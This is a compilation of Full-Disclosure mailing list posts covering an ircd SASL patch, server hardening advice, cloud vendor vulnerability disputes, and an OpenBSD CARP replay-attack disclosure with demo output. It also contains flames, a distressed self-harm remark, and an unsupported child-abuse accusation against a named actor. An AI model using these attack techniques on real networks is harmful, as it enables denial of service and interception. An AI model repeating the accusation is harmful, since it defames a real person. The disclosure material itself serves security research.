[Full-disclosure] Emergency patch for ShadowIRCd versions 6.3+ and Elemental-IRCd 6.5+

[Sam Dodrill]

_p,
sendto_one(target_p, form_str(RPL_SASLSUCCESS),
me.name, EmptyString(target_p->name) ? "*" : target_p->name);
target_p->preClient->sasl_complete = 1;
ServerStats.is_ssuc++;
-   server_auth_sasl(target_p);
+   //server_auth_sasl(target_p);
}
*target_p->preClient->sasl_agent = '\0'; /* Blank the
stored agent so someone else can answer */
}

This patch sometimes has issues when being applied by machine (use vim,
it's not hard) and should only be considered a stopgap to remove the worst
parts of the issue until a more permanent fix is made, tested, and released.

Attempts have been made to contact other networks that use any affected
versions of ShadowIRCd and Elemental-IRCd. All attempts to contact networks
I previously have not encountered have failed.

Patch directions are below:

1. Apply patch by hand
2. run make
3. run make install
4. Connect to the ircd, opering up
5. /modunload m_sasl.so
6. /modload m_sasl.so

You might be tempted to use /modreload, but *DO NOT*. There is a known
issue with reloading a module that has changed on disk that can cause a
segmentation fault. These directions should be followed *immediately* upon
recieving them to avoid opening yourself up to this exploit.

This bug appears to have been introduced with ShadowIRCd 6.3. Details from
the NEWS file below:

-- shadowircd-6.3.0
- use auth::auth_user for SASL. It is no longer usable in PASS (though
its
  use-case there is non-existant), but you can now set so if a user

  successfully authenticates to the accountname in auth_user with SASL,

  they will get the proper auth block privs. You can have multiple
auth_users
  in one auth block.

This patch does disable this functionality, but in this case the
inconvenience is worth the security.

Thanks for reading, and I hope you enjoyed this report. I've been wanting
to make a report to this mailing list for a while now and was hoping it
would not be on one of my own projects, but such is life. Should I request
a CVE be assigned for this as well?

Sam Dodrill
shadow.h...@gmail.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] one of my servers has been compromized

[sam]

Very useful john jacob ... really helpful.
do you maintaine your blog or any other resource you want to share with us.
thanx a ton .

On Mon, Dec 5, 2011 at 8:18 AM, Michael Wood  wrote:
> Awesome tips guys...
>
> On Dec 5, 2011 11:01 AM, "John Jacobs"  wrote:
>>
>>
>> > 2. Do you think said phpmyadmin vulns are reasonable attack vectors in
>> > my
>> > case?
>>
>> I do, I believe this is to be the initial infection vector.  Scanning for
>> PHPMyAdmin is often and frequent and since it's likely that it was present
>> in it's default (or one of the default) URIs discovery is likely.  There are
>> a plethora of scanners out there which look for PHPMyAdmin specifically and
>> add to the Internet noise-floor.
>>
>> You are taking the correct steps with the egress firewall policy.
>>
>> Forward-going, I think it may be valuable to consider:
>>
>> 1) Leveraging AppArmor and creating an enforcing profile for Apache; one
>> that controls by extension or path, what the HTTPd can write to or access.
>> Be strict but sane.
>> 2) Consider chrooting Apache via the 'chroot' directive for Apache (no
>> more mod_chroot required).
>> 3) Consider a strict ingress and egress firewall which would have prevent
>> the egress connection to the IRCd.
>> 4) Remain up to date; perhaps cron 'apt-get clean all; apt-get update;
>> apt-get -t lucid-security -y dist-upgrade' (I believe the security channel
>> is correct)
>> 5) Consider sane php.ini values and leverage Suhosin (plugin) as well
>> (http://www.hardened-php.net/suhosin/index.html); disallow url_fopen and
>> url_include.  Disallow the exec(), system(), passthru(), etc commands if
>> possible.  url_fopen() will thwart RFI.  LFI should be thwarted by a sane
>> AppArmor profile.
>> 6) Restrict access to PHPMyAdmin based on authentication or remove it's
>> access entirely.
>> 7) Consider leveraging something like Fail2ban against Apache's error and
>> access logs looking for excessive high-frequency HTTP 404, 403, or 500
>> errors as these are indicative of scanning.  This is a great tool to stop
>> Web-app scanning.
>> 8) As you've already done with SSH, move it from TCP 22, PermitRootLogin
>> no, and disable password authentication using key-based authentication.
>> 9) Using OSSEC-HIDS (http://www.ossec.net/) with inotify() to watch
>> changes to your system and Apache directories including those that are HTTP
>> writable.
>> 10) Mount /tmp noexec,nosuid,nodev as others have recommended.
>> 11) Optionally use mod_security with a tuned ruleset or another WAF.
>>
>> I find #7 to be extremely helpful.  Feel free to hit me up for additional
>> clarification if needed.  I wish you the best, remember that
>> defense-in-depth is the best approach here.
>>
>> This is a good list-discussion as it is likely to yield many valuable ways
>> to correctly secure web applications.  Potentially any one of the
>> suggestiosn in #1, #2, #3, #4, #5, #6, #7, and #10 would have saved your
>> box.
>>
>> I hope this helped,
>> John
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/



-- 
Best Regards,
Suresh Kumar Prajapati
Linux System Admin
E-mail: er.sureshprajap...@gmail.com
Mob No: +91-8800920533

Theory is when you know all and nothing works. Practice is when all
works and nobody knows why. In this case we have put together theory
and practice: nothing works... and nobody knows why!

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Steam defaced

[Sam Johnston]

On Fri, Nov 11, 2011 at 12:54 AM, xD 0x41  wrote:
>
> about the clouds, dude, i found the whole attacking of amazon as rude,

So did I, which is why I came to Amazon's defense in pointing out that
those in glass houses shouldn't be throwing stones. The company
(Enomaly) abusing Amazon over a complex SAML XML digsig
vulnerability[1] was/is still using a trivial vulnerable signature
mechanism in their own products that Amazon had fixed years ago[2],
among other issues which I had reported 6+ months earlier (not
validating requests, passing prices to clients in hidden form fields,
etc). Their security response is also appalling[3].

> and shit, so, as i said before, your a lamer. and, just stfu and wear
> it, thats MY opinion i did not say the whole list has to follow
> shithead.
>
> stfu and ride your magical carpet thru the clouds... :P~
> to the others who find cloud bs amusing, or ripping or fucking with
> amazon as amusing, go read what your kids are buying shit from.. then
> maybe you would see, some places, you do not fuck with, you ttreat
> with respect, because they sometimes wont affect you directly, but
> oneday, it wmay well do this, thanks to your silly exploits on things
> that should not be used like this, features manipulated into
> exploits...shit, you should not be disclosing shit with amazon, on Fd,
> fullstop.
> If you cannot see my view then, your just as stupid as i have thought.
> now go play with your cloud formations, and upload some f1les to s0m3
> l33t 4p4ch3 s3rv3r kid.
>
> eh sorry henri and others, but i had to just get that out to, about
> cloud/sploitcloud... it is fkn ridicuoud...asking for trouble, people
> like that should get knocks on the door, simply to be put into a
> mnental home for theyre own good.

Sorry for the confusion but that's not at all what I said[4]. No harm
done — others replied off list to say they found it amusing. Anyway I
have a credit card to go cancel (per the subject of this thread).

Sam

1. http://www.theregister.co.uk/2011/11/01/amazon_downplays_cloud_crypto_flaw/
2. 
http://www.daemonology.net/blog/2008-12-18-AWS-signature-version-1-is-insecure.html
3. http://samj.net/2011/11/how-not-to-respond-to-vulnerability.html
4. http://samj.net/2011/10/sploitcloud.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] SploitCloud: exploiting cloud brokers for fun and profit

[Sam Johnston]

Apologies for the HTML — too many inline links.

Sam
SploitCloud: exploiting cloud brokers for fun and
profit<http://samj.net/2011/10/sploitcloud.html>
 My friends at Enomaly <http://www.enomaly.com/> have been
beating<http://twitter.com/#%21/ruv/status/129928434079109121>
up <http://twitter.com/#%21/ruv/status/129929111526318081>
on<http://twitter.com/#%21/ruv/status/129934534870446080> Amazon
Web Services (AWS) <http://aws.amazon.com/> over the XML signature element
wrapping <http://dl.acm.org/citation.cfm?id=1103026> vulnerability
currently being
overhyped<http://www.theregister.co.uk/2011/10/27/cloud_security/>
by<http://www.fiercecio.com/techwatch/story/security-flaw-cloud-architectures-including-amazon-web-services/2011-10-28>
the<http://www.pcworld.com/businesscenter/article/242598/researchers_demo_cloud_security_issue_with_amazon_aws_attack.html>
press<http://www.networkworld.com/news/2011/102611-security-cloud-252406.html>,
which is ironic given their
security<http://www.securityfocus.com/archive/1/archive/1/500573/100/0/threaded>
track<http://www.securityfocus.com/archive/1/archive/1/500573/100/0/threaded>
record <http://www.securityfocus.com/archive/1/500989> and unfortunate
given I rather like what Amazon have achieved.

Back in March I reported multiple
vulnerabilities<https://groups.google.com/group/spotcloudbuyers/browse_thread/thread/1993b3ab1643bfa2>
 in SpotCloud <http://www.spotcloud.com/> (including their having
copied Amazon's
vulnerable 
signatures<http://www.daemonology.net/blog/2008-12-18-AWS-signature-version-1-is-insecure.html>years
after they were reported
and fixed<http://www.jamesmurty.com/2008/12/31/aws-query-signature-version-2/>)
and I was told I was
unethical<https://groups.google.com/group/spotcloudbuyers/msg/237ffac277ea8bbe>and
my report that they "
*may not validate incoming web and/or API requests and if so, may be
vulnerable to cross-site request forgery in which an attacker could make
unauthorised management requests on behalf of a user*" was "unactionably
vague<https://groups.google.com/group/spotcloudbuyers/browse_thread/thread/526fc1d60bfa6e95>
".

To demonstrate the severity of the outstanding vulnerability go grab
yourself a SpotCloud account <https://spotcloud.appspot.com/buyer/register>,
charge it up <https://spotcloud.appspot.com/buyer/balance/topup> (ignoring
PCI-DSS<http://en.wikipedia.org/wiki/Payment_Card_Industry_Data_Security_Standard>for
a second given they're collecting credit card numbers via App Engine)
and click the image below. I'll silently create an instance for you using a
hidden IFRAME, but you're welcome to experiment with more destructive
experiments like deleting existing instances and uploading malicious
workloads.


*Update:* If you look at the code you'll see the hourly rate is passed to
the client as "*cost*" and presumably trusted on return (if not, why is it
there?). I haven't seen a price manipulation
vulnerability<http://www.symantec.com/connect/articles/common-security-vulnerabilities-e-commerce-systems>in
over a decade, but I'm not tinkering with it because I don't fancy
being
accused of stealing from them or their providers.

*Update:* While the consumer API <http://dl.enomaly.com/scbuyerapi> now
uses OAuth, the provider API <http://dl.enomaly.com/scprovider> still
uses Amazon's
vulnerable 
signatures<http://www.daemonology.net/blog/2008-12-18-AWS-signature-version-1-is-insecure.html>for
authentication:

#sorts by key.lowercase(). ie A b c Dee e ffFf
sorted_keys = sorted(parameters.keys(), key=lambda k: k.lower())

#concatenates key,value pairs. a=1,b=2,C=32 becomes "a1b2C32"
data = ’’.join(key + parameters[key] for key in sorted_keys)

#Data is now: 
ecp_usernamespotcloudusernameparamAvalueTimestamp2006-12-08T07:48:03Z
digest = hmac.new(’spotcloudpassword’, data, sha).digest()


This may have been safe over SSL were it not for the fact that client
libraries (including python) typically don't validate the certificate chain
by default.

*Update:* Wells Fargo reports "CHECK CRD PURCHASE SPOT CLOUD ETOBICOKE
CD" as "Unusual Activity" in emailed alert… canceling card, requesting
re-issue. Should have used a virtual card. Wonder if Google know their App
Engine poster 
child<http://googleappengine.blogspot.com/2011/03/enomaly-chooses-google-app-engine-for.html>is
using it to collect credit card details?

*Update:* It is believed that Private
SpotCloud<http://spotcloud.com/Private.50.0.html>and Enomaly
Elastic Computing Platform
(ECP)<http://www.enomaly.com/Product-Overview.419.0.html>are also
vulnerable to cross-site
request forgery <http://en.wikipedia.org/wiki/Cross-site_request_forgery>,
but without access to the software I have no way to 

[Full-disclosure] How NOT to respond to vulnerability reports

[Sam Johnston]

Apologies again for the HTML — too many inline links for text. I'd probably
leave these guys alone were it not for stuff like
this<http://www.enomaly.com/High-Assurance-E.484.0.html>
:

"*With Enomaly’s patented security functionality, a service provider can
deliver a unique, high security Cloud Computing service – commanding a
higher price point than commodity public cloud providers.*"

Enjoy.

Sam
How NOT to respond to vulnerability
reports<http://samj.net/2011/11/how-not-to-respond-to-vulnerability.html>
  <http://memegenerator.net/instance/11298030>

Reuven Cohen <http://www.elasticvapor.com/> and the guys at
Enomaly<http://www.enomaly.com/>could write the book on how NOT to
respond to vulnerability reports:

   1. Don't disavow
vulnerabilities<https://twitter.com/#%21/ruv/status/133221009342992384>in
products you've previously
   
taken<http://www.elasticvapor.com/2008/04/enomaly-launches-giftagcom-for-bestbuyg.html>
   
credit<http://www.elasticvapor.com/2008/09/bestbuys-giftagcom-getting-some-press.html>for
   2. Don't claim issues are not
valid<http://groups.google.com/group/spotcloudbuyers/browse_thread/thread/526fc1d60bfa6e95/426c91bc73b493be>while
denying researchers a right of reply
   3. Don't claim obvious issues are "unactionably
vague<http://groups.google.com/group/spotcloudbuyers/browse_thread/thread/526fc1d60bfa6e95/426c91bc73b493be>"
   and then ignore them, even after a working exploit is publicly
available<http://samj.net/2011/10/sploitcloud.html>
   4. Don't claim trivial remote root exploits are "theoretically valid but
   extremely difficult to
exploit<http://groups.google.com/group/spotcloudbuyers/browse_thread/thread/526fc1d60bfa6e95/426c91bc73b493be>
   "
   5. Don't claim it's ok to rely
on<http://groups.google.com/group/spotcloudbuyers/browse_thread/thread/526fc1d60bfa6e95/426c91bc73b493be>security
by obscurity or race conditions
   6. Don't turn on
moderation<http://groups.google.com/group/spotcloudbuyers/about>because
a researcher posts a vulnerability
   report<http://groups.google.com/group/spotcloudbuyers/msg/a1e010147241298e>to
your lists
   7. Don't subsequently ban a researcher from your
lists<http://1.bp.blogspot.com/-Kbx1w50mK_g/Trp0D54k9LI/AYs/ZZ0tIMoPLZE/s1600/spotcloud-banned.png>because
they tried to notify your users when you failed to
   8. Don't claim that security vulnerabilities are
ok<http://groups.google.com/group/spotcloudbuyers/msg/237ffac277ea8bbe>because
there have been "
   *no reports of any security compromise*"
   9. Don't 
claim<http://samj.net/2009/08/twitter-pro-best-buys-twelpforce-is.html>"
   *other mitigating factors that have been present in the environment from
   the beginning*" when the vulnerability has already been demonstrated
   10. Don't ask for private notification of
vulnerabilities<http://samj.net/2009/08/twitter-pro-best-buys-twelpforce-is.html>only
to then ignore/dispute them
   11. Don't publicly call researchers
unethical<http://groups.google.com/group/spotcloudbuyers/msg/237ffac277ea8bbe>for
opting for full
   disclosure <http://en.wikipedia.org/wiki/Full_disclosure>,
   especially when they do so because you have been reticent and unresponsive
   in the past
   12. Don't release ineffective
fixes<http://seclists.org/bugtraq/2009/Feb/142>,
   especially when the researcher has told you exactly how to fix it
   13. Don't dispute the
vulnerability<http://samj.net/2010/02/private-cloud-security-is-no-security.html>when
a clearinghouse like
   Secunia <http://secunia.com/> contacts you to verify it
   14. Don't criticise
researchers<http://twitter.com/ruv/status/8623995916>for reviewing
your product
   15. Don't shoot the
messenger<http://www.elasticvapor.com/2008/11/v-for-vendetta.html>
   16. Don't downplay critical
vulnerabilities<http://www.elasticvapor.com/2008/11/v-for-vendetta.html>
as
   "*relatively minor*", "random" paths as "*pretty hard to guess*", etc.
   17. Don't send in board
members<http://samj.net/2010/02/private-cloud-security-is-no-security.html?showComment=1265232836593#c6024067410560428601>to
fight your battles
   18. Don't claim new
products<http://samj.net/2010/02/private-cloud-security-is-no-security.html?showComment=1265232836593#c6024067410560428601>
having
   "*significant new and enhanced functionality*" is a valid excuse
   19. Don't make security
claims<http://www.enomaly.com/High-Assurance-E.484.0.html>like "High
Assurance" if you're not going to take security seriously
   20. Don't claim <https://spotcloud.appspot.com/terms> that "*Enomaly
   shall be entitled to (i) suspend or de-ac

[Full-disclosure] Full-Disclosure - sick of your nonsense

[Sam Goody]

Dude, I think many people including myself are sick of your 
nonsense on top of trying to provoke fights on full-disc.

This list is not for chatting and 90% of what you've written is 
subpar.

Please keep the nonsense to yourself. You will now be added to the 
n3td3v e-mail black list.

Cheers!

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] OpenBSD CARP Hash Vulnerability

[Sam Banks]

Hello FD,

I disclosed this bug to the BSDs and no one is interested in fixing it so
here you go. The two files attached are as follows:

* scapy-carp.patch - A patch against the latest Scapy (currently 2.1.0) so
it understands the CARP protocol. The PoC won't work without the patch
* carp-poc.py - A very quick and dirty PoC which will force all CARP nodes
into backup mode. You need to be on the same Layer 2 as the CARP nodes. Also
make sure you have the correct interface selected

Happy hacking,

wolfie

==
VULNERABILITY DETAILS
==

The OpenBSD CARP implementation (and all derivatives, such as FreeBSD and
NetBSD) fails to include all fields contained in the "carp_header"
structure[1] when calculating the SHA1 HMAC hash of the packet in the
function carp_proto_input_c[2]. The two 8-bit fields not included in the
hash generation are "carp_advskew" and "carp_advbase". Among other
functions, the fields are both set to 255 by the master CARP node to
indicate that it wants to step down from the master role.

This behaviour can be exploited to force a backup member to assume the role
of master by capturing a master CARP advertisement, updating the two fields
in question to 255 and replaying the modified packet. A backup node will
receive this packet and the hash check will be satisfied as the two modified
fields are not included in the hash generation. A backup node will now
assume the master role and the current master will step down to backup.

At this point, the attacker can now capture an advertisement from the new
master. By replaying both of the unmodified master advertisements, all CARP
nodes assume the backup role. At this point, a Denial of Service (DoS)
condition has been introduced as no device answers ARP requests for the
Virtual IP (VIP). The attacker can now decide whether to start answering ARP
for the VIP therefore performing a Man in the Middle (MitM) attack.

[1] http://www.openbsd.org/cgi-bin/cvsweb/src/sys/netinet/ip_carp.h?rev=1.28
[2]
http://www.openbsd.org/cgi-bin/cvsweb/src/sys/netinet/ip_carp.c?rev=1.179


DEMO OF ATTACHED CODE


---
MASTER CARP NODE
---
# uname -a; id
OpenBSD ipsec.carpdemo 4.8 GENERIC#136 i386
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty),
5(operator), 20(staff), 31(guest)
# ifconfig carp0 create carpdev vic0 pass supersecretpassword vhid 50 state
master carppeer 192.168.252.138 192.168.50.1/24
# ifconfig carp0
carp0: flags=8843 mtu 1500
lladdr 00:00:5e:00:01:32
priority: 0
carp: MASTER carpdev vic0 vhid 50 advbase 1 advskew 0 carppeer
192.168.252.138
groups: carp
status: master
inet6 fe80::200:5eff:fe00:132%carp0 prefixlen 64 scopeid 0x5
inet 192.168.50.1 netmask 0xff00 broadcast 192.168.50.255
# ifconfig carp0
carp0: flags=8843 mtu 1500
lladdr 00:00:5e:00:01:32
priority: 0
carp: BACKUP carpdev vic0 vhid 50 advbase 1 advskew 0 carppeer
192.168.252.138
groups: carp
status: backup
inet6 fe80::200:5eff:fe00:132%carp0 prefixlen 64 scopeid 0x5
inet 192.168.50.1 netmask 0xff00 broadcast 192.168.50.255
#

---
BACKUP CARP NODE
---

# uname -a; id
OpenBSD backdoor.carpdemo 4.8 GENERIC#136 i386
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty),
5(operator), 20(staff), 31(guest)
# ifconfig carp0 create carpdev vic0 pass supersecretpassword vhid 50 state
backup carppeer 192.168.252.137 192.168.50.1/24
# ifconfig carp0
carp0: flags=8843 mtu 1500
lladdr 00:00:5e:00:01:32
priority: 0
carp: BACKUP carpdev vic0 vhid 50 advbase 1 advskew 0 carppeer
192.168.252.137
groups: carp
status: backup
inet6 fe80::200:5eff:fe00:132%carp0 prefixlen 64 scopeid 0x5
inet 192.168.50.1 netmask 0xff00 broadcast 192.168.50.255
# ifconfig carp0
carp0: flags=8843 mtu 1500
lladdr 00:00:5e:00:01:32
priority: 0
carp: BACKUP carpdev vic0 vhid 50 advbase 1 advskew 0 carppeer
192.168.252.137
groups: carp
status: backup
inet6 fe80::200:5eff:fe00:132%carp0 prefixlen 64 scopeid 0x5
inet 192.168.50.1 netmask 0xff00 broadcast 192.168.50.255
#

--
ATTACKERS COMPUTER
--

r...@traumatic:/files/tools# ./carp-poc.py
WARNING: No route found for IPv6 destination :: (no default route?)
[*] capturing current master's advertisement
[*] forcing failover of master
[*] waiting for new master to be elected
[*] capturing new master's advertisement
[*] replaying both captured packets
diff -Nruw ../scapy-2.1.0-orig/scapy/config.py ./scapy/config.py
--- ../scapy-2.1.0-orig/scapy/config.py	2010-12-18 14:10:38.0 +1300
+++ ./scapy/config.py	2010-12-18 14:11:39.0 +1300
@@ -366,7 +366,7 @@
 netcache = NetCache()
 load_layers = ["l2", "inet",

Re: [Full-disclosure] IRC FRAUD ALERT ADVISORY 01-2010-07

[Sam Hocevar]

On Thu, Jul 08, 2010, IRC FRAUD ALERT wrote:

> Our team strictly consists of volunteers that use their spare time to
> help make the Internet, especially IRC, a better and enjoyable place
> by exposing the scammers and hypocrites of IRC.

   Dear sir, could you elaborate on how exactly blackmailing and
threatening me by e-mail, then sending falsified copies of my answers to
my ISP's CTO and owner as well as to my employer's owner and director
"help make the Internet a better place"?

   You won. Your actions have truly demolished me beyond any possible
recovery and my only hope is that the moral responsibility of my
psychological breakdown and forthcoming self-inflicted scars will haunt
you for the rest of your life.

Regards,
-- 
Sam.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] IRC FRAUD ALERT ADVISORY 01-2010-07

[Sam Hocevar]

On Thu, Jul 08, 2010, IRC FRAUD ALERT wrote:

> The blog is running WordPress 3.1-alpha, which does not have comment
> moderation enabled by default, so it's clearly weev's intention to
> [...]

   Dear sir, why would you lie about trivially verifiable facts? Anyone
can check in the source code that this has actually been Wordpress's
default behaviour for more than 6 years.

Cheers,
-- 
Sam.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Impossible to Maintain Secure Session With Twitter.com Web Interface

[Sam Quigley]

> iSEC Partners Security Advisory - 2010-001-twitter 
> https://www.isecpartners.com
> 
[…]
> 2010-04-26: Twitter asserts that it is now possible to maintain an HTTPS
> session if the session begins with HTTPS; i.e. users can
> navigate to https://twitter.com to start an HTTPS session.
> However, https://twitter.com/ contains HTTP resources, including
> a JSON response from http://twitter.com. An active network
> attacker could potentially use this weakness to insert their
> own code into the page and maintain control over the user's
> session.
> 

Also worth noting that, until yesterday, all SSL pages (including sensitive 
ones like /oauth/authorize) loaded Javascript from maps.google.com without 
using SSL.  Like the issue iSEC identified above, this has now been fixed.

Also yesterday, they (finally) disabled unsafe SSL renegotiation, thus blocking 
the credential-stealing attack identified by Anil Kurmus last November.[1]

So: progress.  Unfortunately, they still support SSLv2 and a variety of weak 
ciphers[2] — so there's still room for improvement.

-sq


[1]: http://www.securegoose.org/2009/11/tls-renegotiation-vulnerability-cve.html
[2]: https://www.ssllabs.com/ssldb/analyze.html?d=twitter.com&s=168.143.162.36
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Ron Livingston likes to touch little boys

[Sam Haldorf]

http://mashable.com/2009/12/05/ron-livinston-lawsuit/

We all know the streisand effect, but why is Ron Livingston so desperate to 
quell on this information.

Because he doesn't want people to understand that he has _Multiple_ male 
partners.

He does all of this look in his face to make it look like he's the "Pure" 
(pewer) guy. But we all know the secret truth, he's fighting tooth and nail 
because he has something to hide.

Ron Livingston needs to learn to stop censoring and just come out of the closet 
now.

Sam Halderf


__
Do You Yahoo!?
Sie sind Spam leid? Yahoo! Mail verfügt über einen herausragenden Schutz gegen 
Massenmails. 
http://mail.yahoo.com ___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Private cloud security is no security at all

[Sam Johnston]

Private cloud security is no security at
all

It's ironic that the purveyors of "Private Cloud" sell their wares on the
premise of enhanced privacy and security - a totally unjustified claim which
is too often accepted without question - and that they are quick to dismiss
the huge benefit of the armies of security boffins employed by "public"
cloud vendors (whose future is largely dependent on keeping customer data
safe). It's also very convenient for them that the term itself is
disparaging of "public" cloud in the same way that "Blog With
Integrity"
badges imply that the rest of us are somehow unethical (one of the main
reasons I personally have and will always dislike[d] it).

It is with that in mind that I was intrigued by Reuven
Cohen
's announcement
today
 regarding Enomaly, Inc.  having recently joined
the Intel Cloud Builder Program
 (whatever
that is). It was these two quotes that I found particularly questionable
regarding their Enomaly ECP product:

   1. *Intel was among the first to full(sic) understand the opportunity in
   enabling a truly secure virtualized cloud computing environments(sic) for
   service providers and Telco's.*
   2. *Our work with the Intel Cloud Builder Program will help to accelerate
   our efforts to deliver a massively-scalable, highly-available,
   high-security cloud platform to our customers.*

The reason I'm naturally suspicious of such claims is that I've already
discovered a handful of critical security vulnerabilities in this product
(and that's without even having to look beyond the startup script - a
secure-by-default turbogears component that was made insecure through
inexplicable modifications):

   1. CVE-2008-4990 Enomaly ECP/Enomalism: Insecure temporary file creation
   
vulnerabilities
   2. CVE-2009-0390: Argument injection vulnerability in Enomaly Elastic
   Computing Platform
(ECP)
   3. Enomaly ECP/Enomalism: Multiple vulnerabilities in enomalism2.sh
   (redux) 

I had to dig a little (but not much) deeper for the silent update remote
command execution vulnerability .
I also inadvertently discovered another serious security
vulnerability
(sending
corporate BestBuy credentials in the clear over the Internet to a 3rd party
service ), which as it turns out was also
developed by Enomaly, Inc. It's only natural that I would be suspicious of
any future security claims made by this company.

It doesn't help my sentiment either that every last trace of the Open
Source ECP Community Edition  was
recently scrubbed from the Internet without notice,
leaving
 angry 
customers 
high 
and
 dry ,
purportedly pending the "rejigging [of their] OSS strategy". While my
previous attempts to fork the product as
Freenomalism failed
when we were unable to get the daemon to start, having the code in any
condition is better than not having it at all. In my opinion this is little
more than blatantly (and successfully I might add) taking advantage of the Open
Source  community for as long as necessary to get
the product into the limelight. Had they not filled this void others would
certainly have done so, and the Open
Cloud
would
be better off today as a result.

As part of cloud standards work I was interested in taking a look at the
"secure" mechanism they developed for distributing virtual machines:

*VMcasting  is an automatic virtual machine
deployment mechanism based on RSS2.0 whereby virtual machine images are
transferred from a server to a client which securely delivers files
containing a technical specification and virtual disk image.*

Another bold claim that initially appeared justified by a simple but
relatively sensible embedding of crytpographically strong checksums into
descriptor and manifest files that were in turn digitally signed using GPG.
Unfortunately no consideration was given to the 

Re: [Full-disclosure] Antisec for lulz - exposed (anti-sec.com)

[Sam Haldorf]

Thanks n3td3v,

http://lists.grok.org.uk/pipermail/full-disclosure/2009-December/071715.html

Key: n3td3vsucks
Decrypt: http://webnet77.com/cgi-bin/helpers/blowfish.pl

Have a happy new year,
Sam





Von: n3td3v 
An: Sam Haldorf 
Gesendet: Freitag, den 1. Januar 2010, 2:39:28 Uhr
Betreff: Re: [Full-disclosure] Antisec for lulz - exposed (anti-sec.com)

Happy new year from everyone at n3td3v Intelligence Branch -
http://twitter.com/n3td3v

On Fri, Jan 1, 2010 at 1:24 AM, Sam Haldorf  wrote:
> n3td3v?
>
> 
> Von: Glafkos Charalambous 
> An: full-disclosure@lists.grok.org.uk
> CC: ro...@darkmindz.com; romeo.hax...@gmail.com; srshax...@hushmail.com;
> coolking...@hotmail.com
> Gesendet: Donnerstag, den 31. Dezember 2009, 17:38:40 Uhr
> Betreff: [Full-disclosure] Antisec for lulz - exposed (anti-sec.com)
>
> .
> |
> \  *  ./
> .  * * * .
>   -=* LULZ! *=-
>   .  .* * *  .
> /*  .\
> |
> .
>
>   _  _
> ( ) ( )
> | |_| |  _ _  _ __ __  _
> |  _  | /'_` )( '_`\ ( '_`\ ( ) ( )
> | | | |( (_| || (_) )| (_) )| (_) |
> (_) (_)`\__,_)| ,__/'| ,__/'`\__, |
>   | || |( )_| |
>   (_)(_)`\___/'
>   _  _  __
> ( ) ( )( )  ( )
> | `\| |  __  _  _  _  `\`\_/'/'___ _  _ __
> | , ` | /'__`\( ) ( ) ( )`\ /'/'__`\ /'_` )( '__)
> | |`\ |(  ___/| \_/ \_/ || |(  ___/( (_| || |
> (_) (_)`\)`\___x___/'(_)`\)`\__,_)(_)
> anti-sec.com
>   .
>   |
>   \  *  ./
> .  * * * .
> -=* RAWR! *=-
> .  .* * *  .
> /*  .\
>   |
>   .
>
> http://www.anti-sec.com
> http://pastebin.com/f12f6f9c0
> http://pastebin.mozilla.org/694145
> http://pastebin.ca/1733192
>
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> __
> Do You Yahoo!?
> Sie sind Spam leid? Yahoo! Mail verfügt über einen herausragenden Schutz
> gegen Massenmails.
> http://mail.yahoo.com
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org..uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>


__
Do You Yahoo!?
Sie sind Spam leid? Yahoo! Mail verfügt über einen herausragenden Schutz gegen 
Massenmails. 
http://mail.yahoo.com ___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Antisec for lulz - exposed (anti-sec.com)

[Sam Haldorf]

n3td3v?




Von: Glafkos Charalambous 
An: full-disclosure@lists.grok.org.uk
CC: ro...@darkmindz.com; romeo.hax...@gmail.com; srshax...@hushmail.com; 
coolking...@hotmail.com
Gesendet: Donnerstag, den 31. Dezember 2009, 17:38:40 Uhr
Betreff: [Full-disclosure] Antisec for lulz - exposed (anti-sec.com)

 . 
 |
 \   *  ./
.  * * * .
   -=* LULZ! *=-  
   .  .* * *  .
/*  .\
 |  
 .

  _   _
 ( ) ( )
 | |_| |   _ _  _ __ __   _ 
 |  _  | /'_` )( '_`\ ( '_`\ ( ) ( )
 | | | |( (_| || (_) )| (_) )| (_) |
 (_) (_)`\__,_)| ,__/'| ,__/'`\__, |
   | || |( )_| |
   (_)(_)`\___/'
  _   _  _ _  
 ( ) ( )( )   ( )
 | `\| |   __   _   _   _   `\`\_/'/'__ _ _  _ __ 
 | , ` | /'__`\( ) ( ) ( )`\ /'/'__`\ /'_` )( '__)
 | |`\ |(  ___/| \_/ \_/ | | |(  ___/( (_| || |  
 (_) (_)`\)`\___x___/' (_)`\)`\__,_)(_)  
 anti-sec.com
  . 
  |
  \   *  ./
 .  * * * .
-=* RAWR! *=-  
.  .* * *  .
 /*  .\
  |  
  .

http://www.anti-sec.com
